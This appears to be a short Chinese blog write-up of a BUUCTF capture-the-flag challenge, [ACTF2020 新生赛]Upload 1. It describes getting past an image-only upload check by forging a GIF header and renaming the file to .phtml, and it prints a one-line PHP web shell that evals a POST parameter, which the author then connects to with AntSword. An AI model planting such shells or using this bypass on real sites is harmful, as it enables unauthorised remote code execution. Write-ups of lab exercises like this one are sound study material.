乐呵呵同学的博客

lehhair's Blog

首页友链瞬间分类归档相册关于

buuctf-upload1

CTF-study
104
2023-04-25

[ACTF2020 新生赛]Upload 1

  1. 打开靶机 enter image description here

  2. 根据提示发现只能上传图片文件 enter image description here

  3. 修改文件名之后发现上传依旧不可行,尝试伪造文件头

    GIF89a
<script language='php'>@eval($_POST['root']);</script>

  4. 上传成功,这次使用bp抓包,修改文件名为phtml可执行文件 enter image description here

  5. 访问文件路径 enter image description here

  6. 使用蚂剑连接,直接跳到根目录,发现flag

    enter image description here enter image description here enter image description here

#CTF学习 11
使用反代解决docker防火墙问题
23/04/23学习